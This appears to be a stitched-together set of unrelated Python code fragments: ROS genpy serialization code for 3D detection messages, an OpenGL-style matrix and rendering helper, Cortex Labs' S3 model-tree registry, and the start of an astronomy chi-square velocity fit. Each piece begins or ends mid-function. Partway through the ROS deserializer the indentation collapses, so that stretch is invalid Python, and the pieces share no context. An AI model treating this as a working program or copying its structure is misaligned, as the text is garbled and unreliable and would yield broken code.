          _x = val3
          start = end
          end += 9
          (_x.offset, _x.datatype, _x.count,) = _get_struct_IBI().unpack(str[start:end])
          _v26.fields.append(val3)
        _x = _v26
        start = end
        end += 9
        (_x.is_bigendian, _x.point_step, _x.row_step,) = _get_struct_B2I().unpack(str[start:end])
        _v26.is_bigendian = bool(_v26.is_bigendian)
        # raw point data: length-prefixed byte blob (kept as bytes, not decoded)
        start = end
        end += 4
        (length,) = _struct_I.unpack(str[start:end])
        start = end
        end += length
        _v26.data = str[start:end]
        start = end
        end += 1
        (_v26.is_dense,) = _get_struct_B().unpack(str[start:end])
        _v26.is_dense = bool(_v26.is_dense)
        # trailing Detection3D fields: is_tracking flag + tracking_id string
        start = end
        end += 1
        (val1.is_tracking,) = _get_struct_B().unpack(str[start:end])
        val1.is_tracking = bool(val1.is_tracking)
        start = end
        end += 4
        (length,) = _struct_I.unpack(str[start:end])
        start = end
        end += length
        if python3:
          val1.tracking_id = str[start:end].decode('utf-8', 'rosmsg')
        else:
          val1.tracking_id = str[start:end]
        self.detections.append(val1)
      return self
    except struct.error as e:
      raise genpy.DeserializationError(e) # most likely buffer underfill
  def serialize_numpy(self, buff, numpy):
    """
    serialize message with numpy array types into buffer
    :param buff: buffer, ``StringIO``
    :param numpy: numpy python module
    """
    # NOTE: auto-generated ROS (genpy) serialization code; mirrors
    # serialize() but writes numpy-backed fields (covariance) via tostring().
    try:
      _x = self
      # std_msgs/Header: seq + stamp (3 x uint32)
      buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))
      # length-prefixed frame_id string (UTF-8 encoded on Python 3 / unicode)
      _x = self.header.frame_id
      length = len(_x)
      if python3 or type(_x) == unicode:
        _x = _x.encode('utf-8')
        length = len(_x)
      buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
      # detections: length-prefixed array of Detection3D
      length = len(self.detections)
      buff.write(_struct_I.pack(length))
      for val1 in self.detections:
        # per-detection header
        _v29 = val1.header
        _x = _v29.seq
        buff.write(_get_struct_I().pack(_x))
        _v30 = _v29.stamp
        _x = _v30
        buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))
        _x = _v29.frame_id
        length = len(_x)
        if python3 or type(_x) == unicode:
          _x = _x.encode('utf-8')
          length = len(_x)
        buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
        # results: array of ObjectHypothesisWithPose
        length = len(val1.results)
        buff.write(_struct_I.pack(length))
        for val2 in val1.results:
          _x = val2.id
          length = len(_x)
          if python3 or type(_x) == unicode:
            _x = _x.encode('utf-8')
            length = len(_x)
          buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
          _x = val2.score
          buff.write(_get_struct_d().pack(_x))
          # pose with covariance: position + quaternion, then raw covariance
          _v31 = val2.pose
          _v32 = _v31.pose
          _v33 = _v32.position
          _x = _v33
          buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))
          _v34 = _v32.orientation
          _x = _v34
          buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w))
          # covariance is a numpy array in the numpy variant; tostring()
          # emits its raw bytes (36 x float64)
          buff.write(_v31.covariance.tostring())
        # bbox: center pose and size vector
        _v35 = val1.bbox
        _v36 = _v35.center
        _v37 = _v36.position
        _x = _v37
        buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))
        _v38 = _v36.orientation
        _x = _v38
        buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w))
        _v39 = _v35.size
        _x = _v39
        buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))
        # source_cloud: sensor_msgs/PointCloud2
        _v40 = val1.source_cloud
        _v41 = _v40.header
        _x = _v41.seq
        buff.write(_get_struct_I().pack(_x))
        _v42 = _v41.stamp
        _x = _v42
        buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))
        _x = _v41.frame_id
        length = len(_x)
        if python3 or type(_x) == unicode:
          _x = _x.encode('utf-8')
          length = len(_x)
        buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
        _x = _v40
        buff.write(_get_struct_2I().pack(_x.height, _x.width))
        # fields: array of sensor_msgs/PointField
        length = len(_v40.fields)
        buff.write(_struct_I.pack(length))
        for val3 in _v40.fields:
          _x = val3.name
          length = len(_x)
          if python3 or type(_x) == unicode:
            _x = _x.encode('utf-8')
            length = len(_x)
          buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
          _x = val3
          buff.write(_get_struct_IBI().pack(_x.offset, _x.datatype, _x.count))
        _x = _v40
        buff.write(_get_struct_B2I().pack(_x.is_bigendian, _x.point_step, _x.row_step))
        _x = _v40.data
        length = len(_x)
        # - if encoded as a list instead, serialize as bytes instead of string
        if type(_x) in [list, tuple]:
          buff.write(struct.Struct('<I%sB'%length).pack(length, *_x))
        else:
          buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
        _x = _v40.is_dense
        buff.write(_get_struct_B().pack(_x))
        # trailing Detection3D fields: is_tracking flag + tracking_id string
        _x = val1.is_tracking
        buff.write(_get_struct_B().pack(_x))
        _x = val1.tracking_id
        length = len(_x)
        if python3 or type(_x) == unicode:
          _x = _x.encode('utf-8')
          length = len(_x)
        buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
    except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
    except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize_numpy(self, str, numpy):
"""
unpack serialized message in str into this message instance using numpy for array types
:param str: byte array of serialized message, ``str``
:param numpy: numpy python module
"""
if python3:
codecs.lookup_error("rosmsg").msg_type = self._type
try:
if self.header is None:
self.header = std_msgs.msg.Header()
if self.detections is None:
self.detections = None
end = 0
_x = self
start = end
end += 12
(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.header.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
self.header.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.detections = []
for i in range(0, length):
val1 = vision_msgs.msg.Detection3D()
_v43 = val1.header
start = end
end += 4
(_v43.seq,) = _get_struct_I().unpack(str[start:end])
_v44 = _v43.stamp
_x = _v44
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v43.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
_v43.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val1.results = []
for i in range(0, length):
val2 = vision_msgs.msg.ObjectHypothesisWithPose()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val2.id = str[start:end].decode('utf-8', 'rosmsg')
else:
val2.id = str[start:end]
start = end
end += 8
(val2.score,) = _get_struct_d().unpack(str[start:end])
_v45 = val2.pose
_v46 = _v45.pose
_v47 = _v46.position
_x = _v47
start = end
end += 24
(_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])
_v48 = _v46.orientation
_x = _v48
start = end
end += 32
(_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end])
start = end
end += 288
_v45.covariance = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=36)
val1.results.append(val2)
_v49 = val1.bbox
_v50 = _v49.center
_v51 = _v50.position
_x = _v51
start = end
end += 24
(_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])
| |
#!/usr/bin/env python3
"""
Duplicate OpenGL coordinate system...
See:
https://gamedev.stackexchange.com/questions/153078/what-can-i-do-with-the-4th-component-of-gl-position
"""
import sys
from math import sin, cos, pi, sqrt
import numpy
scalar = numpy.float64
EPSILON = 1e-6
class Mat(object):
    """
    A thin wrapper around a 2-d numpy array, used as a matrix or column
    vector for OpenGL-style homogeneous-coordinate transformations.
    Equality is approximate: total elementwise error compared to EPSILON.
    """
    def __init__(self, cs):
        # Accept any array-like; a 1-d sequence becomes a column vector.
        A = numpy.array(cs, dtype=scalar)
        if len(A.shape)==1:
            m = len(A)
            A.shape = (m, 1) # col vector
        assert len(A.shape)==2, A.shape
        self.A = A
        self.shape = A.shape
    def strvec(self):
        "Render a column vector as Mat([...])."
        v = self.A[:, 0]
        s = str(list(v))
        return "Mat(%s)"%(s,)
    def __str__(self):
        if self.shape[1] == 1:
            return self.strvec()
        A = self.A
        rows = [', '.join(["%.6f"%x for x in row]) for row in A]
        rows = ["[%s]"%row for row in rows]
        rows = "[%s]"%("\n".join(rows),)
        # shorten exact integers for readability
        rows = rows.replace(".000000", ". ")
        return rows
    __repr__ = __str__
    def __eq__(self, other):
        "Approximate equality: summed absolute elementwise error below EPSILON."
        other = Mat.promote(other)
        assert self.shape == other.shape
        err = numpy.abs(self.A - other.A).sum()
        return err < EPSILON
    def __ne__(self, other):
        return not self.__eq__(other)
    def copy(self):
        "Deep copy (the underlying array is copied)."
        A = self.A.copy()
        return Mat(A)
    @classmethod
    def promote(cls, item):
        "Coerce item to a Mat (no-op if it already is one)."
        if isinstance(item, Mat):
            return item
        m = Mat(item)
        return m
    @classmethod
    def identity(cls, n):
        "The n-by-n identity matrix."
        A = numpy.identity(n)
        return cls(A)
    def __add__(self, other):
        other = Mat.promote(other)
        assert self.shape == other.shape
        A = self.A + other.A
        return Mat(A)
    def __sub__(self, other):
        other = Mat.promote(other)
        assert self.shape == other.shape
        A = self.A - other.A
        return Mat(A)
    def __neg__(self):
        A = -self.A
        return Mat(A)
    def __mul__(self, other):
        "Matrix multiplication (inner dimensions must agree)."
        other = Mat.promote(other)
        assert self.shape[1] == other.shape[0]
        A = numpy.dot(self.A, other.A)
        return Mat(A)
    def __rmul__(self, r):
        "Scalar multiplication: r * M."
        A = r*self.A
        return Mat(A)
    def __getitem__(self, idx):
        # Tuple indexing returns the raw numpy scalar; slices return a Mat;
        # a plain int on a column vector returns its idx-th component.
        if type(idx) is tuple:
            return self.A[idx] # <------ return
        elif type(idx) is slice:
            A = self.A[idx]
            return Mat(A) # <----- return
        if self.shape[1] == 1:
            idx = (idx, 0)
        return self.A[idx]
    def __setitem__(self, idx, value):
        if type(idx) is tuple:
            pass
        elif self.shape[1] == 1:
            idx = (idx, 0)
        self.A[idx] = value
    @classmethod
    def frustum(cls, left, right, bottom, top, nearval, farval):
        # mesa/src/mesa/math/m_matrix.c
        """
        GLfloat x, y, a, b, c, d;
        GLfloat m[16];
        x = (2.0F*nearval) / (right-left);
        y = (2.0F*nearval) / (top-bottom);
        a = (right+left) / (right-left);
        b = (top+bottom) / (top-bottom);
        c = -(farval+nearval) / ( farval-nearval);
        d = -(2.0F*farval*nearval) / (farval-nearval); /* error? */
        #define M(row,col) m[col*4+row]
        M(0,0) = x; M(0,1) = 0.0F; M(0,2) = a; M(0,3) = 0.0F;
        M(1,0) = 0.0F; M(1,1) = y; M(1,2) = b; M(1,3) = 0.0F;
        M(2,0) = 0.0F; M(2,1) = 0.0F; M(2,2) = c; M(2,3) = d;
        M(3,0) = 0.0F; M(3,1) = 0.0F; M(3,2) = -1.0F; M(3,3) = 0.0F;
        #undef M
        matrix_multf( mat, m, MAT_FLAG_PERSPECTIVE );
        """
        # NOTE(review): unimplemented -- the docstring carries the mesa C
        # reference implementation this is intended to mirror.
        pass # TODO
    @classmethod
    def rotate(cls, angle, x, y, z):
        "Rotation matrix about the axis (x, y, z); angle in degrees (cf. glRotate)."
        # angle in degrees
        s = sin(angle * pi / 180.0)
        c = cos(angle * pi / 180.0)
        M = cls.identity(4)
        r = sqrt(x*x + y*y + z*z)
        if r < EPSILON:
            # NOTE(review): a near-zero axis returns None, not a Mat --
            # callers must handle this.
            return
        x /= r
        y /= r
        z /= r
        xx = x * x
        yy = y * y
        zz = z * z
        xy = x * y
        yz = y * z
        zx = z * x
        xs = x * s
        ys = y * s
        zs = z * s
        one_c = 1.0 - c
        M[0,0] = (one_c * xx) + c
        M[0,1] = (one_c * xy) - zs
        M[0,2] = (one_c * zx) + ys
        M[0,3] = 0.0
        M[1,0] = (one_c * xy) + zs
        M[1,1] = (one_c * yy) + c
        M[1,2] = (one_c * yz) - xs
        M[1,3] = 0.0
        M[2,0] = (one_c * zx) - ys
        M[2,1] = (one_c * yz) + xs
        M[2,2] = (one_c * zz) + c
        M[2,3] = 0.0
        M[3,0] = 0.0
        M[3,1] = 0.0
        M[3,2] = 0.0
        M[3,3] = 1.0
        return M
    @classmethod
    def translate(cls, *args):
        "modelled after glTranslate"
        # Homogeneous translation: identity with args down the last column.
        n = len(args)+1
        A = numpy.identity(n)
        for i,val in enumerate(args):
            A[i, n-1] = val
        M = cls(A)
        return M
    @classmethod
    def scale(cls, sx, sy, sz):
        "modelled after glScale"
        A = numpy.identity(4)
        A[0, 0] = sx
        A[1, 1] = sy
        A[2, 2] = sz
        M = cls(A)
        return M
    @classmethod
    def perspective(cls, fovy, aspect, z_near, z_far):
        "modelled after gluPerspective"
        theta = fovy / 2 * pi / 180
        delta_z = z_far - z_near
        sine = sin(theta)
        if (delta_z == 0) or (sine == 0) or (aspect == 0):
            # NOTE(review): degenerate parameters return None, not a Mat.
            return
        cotangent = cos(theta) / sine
        A = numpy.identity(4)
        A[0,0] = cotangent / aspect
        A[1,1] = cotangent
        A[2,2] = -(z_far + z_near) / delta_z
        #A[2,3] = -1
        A[3,2] = -1
        #A[3,2] = -2 * z_near * z_far / delta_z
        A[2,3] = -2 * z_near * z_far / delta_z
        A[3,3] = 0
        M = Mat(A)
        return M
    def norm(self):
        "Euclidean (Frobenius) norm of all entries."
        A = self.A
        r = (A*A).sum()**0.5
        return r
    def normalized(self):
        "Return a unit-norm copy; asserts the norm exceeds EPSILON."
        r = self.norm()
        assert r>EPSILON
        A = self.A / r
        return Mat(A)
    def cross(self, other):
        "Cross product of two 3-d column vectors."
        assert self.shape == (3, 1)
        assert other.shape == (3, 1)
        cs = [
            self[1]*other[2] - self[2]*other[1],
            self[2]*other[0] - self[0]*other[2],
            self[0]*other[1] - self[1]*other[0]]
        return Mat(cs)
    def dot(self, other):
        "Dot product of two 3-d column vectors."
        assert self.shape == (3, 1)
        assert other.shape == (3, 1)
        r = (self.A*other.A).sum()
        return r
    @classmethod
    def lookat(cls, eye, center, up):
        "modelled after gluLookAt"
        eye = cls.promote(eye)
        center = cls.promote(center)
        up = cls.promote(up)
        # Build an orthonormal camera frame: side, recomputed up, -forward.
        forward = center - eye
        forward = forward.normalized()
        side = forward.cross(up)
        side = side.normalized()
        up = side.cross(forward)
        #M = cls.identity(4)
        M = numpy.identity(4)
        M[0,0] = side[0]
        M[1,0] = side[1]
        M[2,0] = side[2]
        M[0,1] = up[0]
        M[1,1] = up[1]
        M[2,1] = up[2]
        M[0,2] = -forward[0]
        M[1,2] = -forward[1]
        M[2,2] = -forward[2]
        M = M.transpose()
        M = Mat(M)
        # Rotate into the camera frame, then translate the eye to the origin.
        M1 = cls.translate(-eye[0], -eye[1], -eye[2])
        M = M*M1
        return M
# ----------------------------------------------------------------------
def test_perspective():
    """Mat.perspective must reproduce the known gluPerspective matrix for 640x480, fov 45."""
    width, height = 640, 480
    proj = Mat.perspective(45., width/height, 0.1, 100.) * Mat.identity(4)
    expected = Mat([
        [ 1.8106601, 0., 0., 0., ],
        [ 0., 2.4142137, 0., 0., ],
        [ 0., 0., -1.002002, -0.2002002, ],
        [ 0., 0., -1., 0., ]])
    assert proj == expected
test_perspective()
# ----------------------------------------------------------------------
from bruhat.render.base import SCALE_CM_TO_POINT
from bruhat.render.front import *
def mkpath(pts, closepath=True):
    """Build a path: moveto the first point, lineto each remaining one, optionally close."""
    segments = [path.moveto(*pts[0])]
    for point in pts[1:]:
        segments.append(path.lineto(*point))
    if closepath:
        segments.append(path.closepath())
    return path.path(*segments)
class GItem(object):
    """Base class for renderable geometry items built from a vertex list."""
    def __init__(self, verts, epsilon=1e-4):
        assert len(verts) >= 3
        total = verts[0]
        for vert in verts[1:]:
            total = total + vert
        center = (1./len(verts))*total
        if epsilon is not None and len(verts)>1:
            # Push each vertex slightly outward from the center to try to
            # cover up the seams.  Does not look good with alpha blending.
            verts = [v + epsilon*(v-center).normalized() for v in verts]
        self.verts = verts
        self.center = center
    def render(self, cvs):
        # Subclasses draw themselves onto the canvas here.
        pass
class GPoly(GItem):
    """A flat polygon with a single face normal, drawn filled and/or stroked."""
    def __init__(self, verts, fill=None, stroke=None, epsilon=1e-2):
        GItem.__init__(self, verts, epsilon)
        self.fill = fill
        self.stroke = stroke
        # Face normal from the first three (pre-expansion) vertices.
        p0, p1, p2 = verts[:3]
        face = (p1-p0).cross(p2-p0)
        assert face.norm() > EPSILON
        self.normal = face.normalized()
    def render(self, view, cvs):
        GItem.render(self, cvs)
        canvas_verts = [view.trafo_canvas(v) for v in self.verts]
        center = self.center
        normal = self.normal
        # Shade flat colors at the polygon center.
        fill = self.fill
        if fill is not None:
            fill = view.illuminate(center, normal, fill)
        stroke = self.stroke
        if stroke is not None:
            stroke = view.illuminate(center, normal, stroke)
        cvs.append(Polygon(canvas_verts, fill, stroke))
class GMesh(GItem):
    """A polygon with per-vertex normals, rendered with per-vertex shading."""
    def __init__(self, verts, normals, fill, epsilon=1e-2):
        GItem.__init__(self, verts, epsilon)
        assert len(verts) >= 3
        assert len(verts) == len(normals)
        # Face normal from the first three (pre-expansion) vertices.
        p0, p1, p2 = verts[:3]
        face_normal = ((p1-p0).cross(p2-p0)).normalized()
        # Every supplied normal must point to the same side as the face.
        for vertex_normal in normals:
            assert face_normal.dot(vertex_normal) > 0.
        self.normals = normals
        self.fill = fill
    def render(self, view, cvs):
        GItem.render(self, cvs)
        canvas_verts = [view.trafo_canvas(v) for v in self.verts]
        shaded = [view.illuminate(v, n, self.fill)
            for (v, n) in zip(self.verts, self.normals)]
        cvs.append(Polymesh(canvas_verts, shaded))
#class GBall(GItem):
# def __init__(self, point, radius):
# GItem.__init__(self, [point])
# self.radius = radius
#
# def render(self, cvs):
# GItem.render(self, cvs)
class Light(object):
    """A point light source with a 3-d position (column vector) and a color."""
    def __init__(self, position, color):
        # Position must be a column vector: 3 rows, 1 column.
        assert position.shape == (3, 1)
        self.position = position
        self.color = color
class View(object):
def __init__(self, _width=640, _height=480):
#global width, height, viewport, proj, model
scale = 0.05 # XXX 1./SCALE_CM_TO_POINT
width, height = scale*_width, scale*_height
self.viewport = (0., 0., width, height)
self.proj = Mat.identity(4) # Projection matrix
self.model = Mat.identity(4) # ModelView matrix
self.stack = []
| |
# Copyright 2021 Cortex Labs, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import datetime
import itertools
import os
import threading as td
from typing import List, Dict, Tuple, AbstractSet
from cortex_internal.lib import util
from cortex_internal.lib.concurrency import ReadWriteLock
from cortex_internal.lib.exceptions import CortexException, WithBreak
from cortex_internal.lib.log import configure_logger
from cortex_internal.lib.model.validation import (
validate_models_dir_paths,
validate_model_paths,
ModelVersion,
)
from cortex_internal.lib.storage import S3
from cortex_internal.lib.type import HandlerType
logger = configure_logger("cortex", os.environ["CORTEX_LOG_CONFIG_FILE"])
class ModelsTree:
    """
    Model tree for S3 models.
    """
    def __init__(self):
        # model ID ("<name>-<version>") -> {"bucket", "path", "sub_paths", "timestamp"}
        self.models = {}
        # model ID -> ReadWriteLock guarding that model's entry
        self._locks = {}
        # guards lazy creation of entries in self._locks
        self._create_lock = td.RLock()
        # model IDs that update_models() is allowed to evict
        self._removable = set()
    def acquire(self, mode: str, model_name: str, model_version: str) -> None:
        """
        Acquire shared/exclusive (R/W) access for a specific model. Use this when multiple threads are used.
        Args:
            mode: "r" for read lock, "w" for write lock.
            model_name: The name of the model.
            model_version: The version of the model.
        """
        model_id = f"{model_name}-{model_version}"
        # Lazily create the per-model lock; re-check under _create_lock so two
        # threads racing here still end up sharing a single lock object.
        if not model_id in self._locks:
            lock = ReadWriteLock()
            self._create_lock.acquire()
            if model_id not in self._locks:
                self._locks[model_id] = lock
            self._create_lock.release()
        self._locks[model_id].acquire(mode)
    def release(self, mode: str, model_name: str, model_version: str) -> None:
        """
        Release shared/exclusive (R/W) access for a specific model. Use this when multiple threads are used.
        Args:
            mode: "r" for read lock, "w" for write lock.
            model_name: The name of the model.
            model_version: The version of the model.
        """
        model_id = f"{model_name}-{model_version}"
        # Assumes acquire() was called first (the lock must already exist).
        self._locks[model_id].release(mode)
    def update_models(
        self,
        model_names: List[str],
        model_versions: Dict[str, List[str]],
        model_paths: List[str],
        sub_paths: List[List[str]],
        timestamps: List[List[datetime.datetime]],
        bucket_names: List[str],
    ) -> Tuple[AbstractSet[str], AbstractSet[str]]:
        """
        Updates the model tree with the latest from the upstream and removes stale models.
        Locking is not required. Locking is already done within the method.
        Args:
            model_names: The unique names of the models as discovered in models:dir or specified in models:paths.
            model_versions: The detected versions of each model. If the list is empty, then version "1" should be assumed. The dictionary keys represent the models' names.
            model_paths: S3 model paths to each model.
            sub_paths: A list of filepaths lists for each file of each model.
            timestamps: When was each versioned model updated the last time on the upstream. When no versions are passed, a timestamp is still expected.
            bucket_names: A list with the bucket_names required for each model. Empty elements if no bucket is used.
        Returns:
            The loaded model IDs ("<model-name>-<model-version") that haven't been found in the passed parameters.
            Which model IDs have been updated. If these model IDs are in memory or on disk already, then they should get updated as well.
        Also sets an info attribute which might look like this:
        {
            "<model-name>": ,
        }
        And where "versions" represents the available versions of a model <model-name> and each "timestamps" element is the corresponding
        last-edit time of each versioned model.
        """
        current_model_ids = set()
        updated_model_ids = set()
        for idx in range(len(model_names)):
            model_name = model_names[idx]
            # No explicit versions: treat the model as single-version "1".
            if len(model_versions[model_name]) == 0:
                model_id = f"{model_name}-1"
                with LockedModelsTree(self, "w", model_name, "1"):
                    updated = self.update_model(
                        bucket_names[idx],
                        model_name,
                        "1",
                        model_paths[idx],
                        sub_paths[idx],
                        timestamps[idx][0],
                        True,
                    )
                    current_model_ids.add(model_id)
                    if updated:
                        updated_model_ids.add(model_id)
            for v_idx, model_version in enumerate(model_versions[model_name]):
                model_id = f"{model_name}-{model_version}"
                with LockedModelsTree(self, "w", model_name, model_version):
                    updated = self.update_model(
                        bucket_names[idx],
                        model_name,
                        model_version,
                        os.path.join(model_paths[idx], model_version) + "/",
                        sub_paths[idx],
                        timestamps[idx][v_idx],
                        True,
                    )
                    current_model_ids.add(model_id)
                    if updated:
                        updated_model_ids.add(model_id)
        # Evict stale entries, but only those flagged as removable.  Note the
        # returned old_model_ids still includes stale-but-not-removable IDs.
        old_model_ids = set(self.models.keys()) - current_model_ids
        for old_model_id in old_model_ids:
            model_name, model_version = old_model_id.rsplit("-", maxsplit=1)
            if old_model_id not in self._removable:
                continue
            with LockedModelsTree(self, "w", model_name, model_version):
                del self.models[old_model_id]
                self._removable = self._removable - set([old_model_id])
        return old_model_ids, updated_model_ids
    def update_model(
        self,
        bucket: str,
        model_name: str,
        model_version: str,
        model_path: str,
        sub_paths: List[str],
        timestamp: datetime.datetime,
        removable: bool,
    ) -> bool:
        """
        Updates the model tree with the given model.
        Locking is required.
        Args:
            bucket: The bucket on which the model is stored. Empty if there's no bucket.
            model_name: The unique name of the model as discovered in models:dir or specified in models:paths.
            model_version: A detected version of the model.
            model_path: The model path to the versioned model.
            sub_paths: A list of filepaths for each file of the model.
            timestamp: When was the model path updated the last time.
            removable: If update_models method is allowed to remove the model.
        Returns:
            True if the model wasn't in the tree or if the timestamp is newer. False otherwise.
        """
        model_id = f"{model_name}-{model_version}"
        has_changed = False
        if model_id not in self.models:
            has_changed = True
        elif self.models[model_id]["timestamp"] < timestamp:
            has_changed = True
        # NOTE(review): this condition is always true -- if has_changed is
        # False, then model_id must already be in self.models.  The entry is
        # therefore rewritten on every call.
        if has_changed or model_id in self.models:
            self.models[model_id] = {
                "bucket": bucket,
                "path": model_path,
                "sub_paths": sub_paths,
                "timestamp": timestamp,
            }
        if removable:
            self._removable.add(model_id)
        else:
            self._removable = self._removable - set([model_id])
        return has_changed
    def model_info(self, model_name: str) -> dict:
        """
        Gets model info about the available versions and model timestamps.
        Locking is not required.
        Returns:
            A dict with keys "bucket", "model_paths, "versions" and "timestamps".
            "model_paths" contains the s3 prefixes of each versioned model, "versions" represents the available versions of the model,
            and each "timestamps" element is the corresponding last-edit time of each versioned model.
            Empty lists are returned if the model is not found.
        Example of returned dictionary for model_name.
        ```json
        {
            "bucket": "bucket-0",
            "model_paths": ["modelA/1", "modelA/4", "modelA/7", ...],
            "versions": [1,4,7, ...],
            "timestamps": [12884999, 12874449, 12344931, ...]
        }
        ```
        """
        info = {
            "model_paths": [],
            "versions": [],
            "timestamps": [],
        }
        # to ensure atomicity
        models = self.models.copy()
        for model_id in models:
            _model_name, model_version = model_id.rsplit("-", maxsplit=1)
            if _model_name == model_name:
                if "bucket" not in info:
                    info["bucket"] = models[model_id]["bucket"]
                info["model_paths"] += [os.path.join(models[model_id]["path"], model_version)]
                # NOTE(review): versions are appended as strings here while the
                # docstring example shows ints; raw timestamps are kept (not
                # converted as in get_all_models_info) -- confirm callers.
                info["versions"] += [model_version]
                info["timestamps"] += [models[model_id]["timestamp"]]
        return info
    def get_model_names(self) -> List[str]:
        """
        Gets the available model names.
        Locking is not required.
        Returns:
            List of all model names.
        """
        model_names = set()
        # to ensure atomicity
        models = self.models.copy()
        for model_id in models:
            # model IDs are "<name>-<version>"; split on the last dash.
            model_name = model_id.rsplit("-", maxsplit=1)[0]
            model_names.add(model_name)
        return list(model_names)
    def get_all_models_info(self) -> dict:
        """
        Gets model info about the available versions and model timestamps.
        Locking is not required.
        It's like model_info method, but for all model names.
        Example of returned dictionary.
        ```json
        {
            ...
            "modelA": {
                "bucket": "bucket-0",
                "model_paths": ["modelA/1", "modelA/4", "modelA/7", ...],
                "versions": ["1","4","7", ...],
                "timestamps": [12884999, 12874449, 12344931, ...]
            }
            ...
        }
        ```
        """
        models_info = {}
        # to ensure atomicity
        models = self.models.copy()
        # extract model names
        model_names = set()
        for model_id in models:
            model_name = model_id.rsplit("-", maxsplit=1)[0]
            model_names.add(model_name)
        model_names = list(model_names)
        # build models info dictionary
        for model_name in model_names:
            model_info = {
                "model_paths": [],
                "versions": [],
                "timestamps": [],
            }
            for model_id in models:
                _model_name, model_version = model_id.rsplit("-", maxsplit=1)
                if _model_name == model_name:
                    if "bucket" not in model_info:
                        model_info["bucket"] = models[model_id]["bucket"]
                    model_info["model_paths"] += [
                        os.path.join(models[model_id]["path"], model_version)
                    ]
                    model_info["versions"] += [model_version]
                    # timestamps are converted to int unix epochs here (unlike
                    # model_info, which keeps the raw datetime objects).
                    model_info["timestamps"] += [int(models[model_id]["timestamp"].timestamp())]
            models_info[model_name] = model_info
        return models_info
    def __getitem__(self, model_id: str) -> dict:
        """
        Each value of a key (model ID) is a dictionary with the following format:
        {
            "bucket": <bucket-of-the-model>,
            "path": <path-of-the-model>,
            "sub_paths": <sub-path-of-each-file-of-the-model>,
            "timestamp": <when-was-the-model-last-modified>
        }
        Locking is required.
        """
        # Return a shallow copy so callers cannot mutate the tree's entry.
        return self.models[model_id].copy()
    def __contains__(self, model_id: str) -> bool:
        """
        Each value of a key (model ID) is a dictionary with the following format:
        {
            "bucket": <bucket-of-the-model>,
            "path": <path-of-the-model>,
            "sub_paths": <sub-path-of-each-file-of-the-model>,
            "timestamp": <when-was-the-model-last-modified>
        }
        Locking is required.
        """
        return model_id in self.models
class LockedModelsTree:
"""
When acquiring shared/exclusive (R/W) access to a model resource (model name + version).
Locks just for a specific model. Apply read lock when granting shared access or write lock when it's exclusive access (for adding/removing operations).
The context manager can be exited by raising cortex_internal.lib.exceptions.WithBreak.
"""
def __init__(self, tree: ModelsTree, mode: str, model_name: str, model_version: str):
"""
mode can be "r" for read or "w" for write.
"""
self._tree = tree
self._mode = mode
self._model_name = model_name
self._model_version = model_version
def __enter__(self):
self._tree.acquire(self._mode, self._model_name, self._model_version)
return self
def __exit__(self, exc_type, exc_value, traceback) -> bool:
self._tree.release(self._mode, | |
# velocity, smoothing, and (bonus) continuum value (m,b)
# If you use 4 parameters, this will get ugly.
#
# Calculate errors from your chi2 contours on the velocity only.
# Grid search over (velocity, line-spread) per star: minimize chi^2 and plot.
v_guess = [-400,-400,-50]
lsf_grid = np.arange(5,30,1)
# Avoid shadowing the builtin `id`: use an explicit loop-variable name.
for star_idx, vg in zip(star_id, v_guess):
    # SET DATA SPECTRUM AND INITIALIZE VELOCITY GRID
    data = hdu[star_idx].data
    wmask = (data['OPT_WAVE'] > 8300) & (data['OPT_WAVE'] < 8700)
    v_grid = np.arange(-15,15,0.1) + vg
    # Smoothing depends only on lsf, not on velocity: smooth each template
    # once per lsf instead of once per (v, lsf) pair.
    smoothed_templates = {lsf: smooth_spectrum(pflux, lsf) for lsf in lsf_grid}
    # DOUBLE FOR LOOP, HERE WE COME!
    # Accumulate into Python lists (np.append in a loop is quadratic).
    chi2_vals, v_vals, lsf_vals = [], [], []
    for v in v_grid:
        # SHIFT SYNTHETIC WAVELENGTH (loop-invariant for the inner lsf loop)
        shifted_wave = pwave * (1 + v/2.997924e5)
        for lsf in lsf_grid:
            # MATCH CONTINUUM
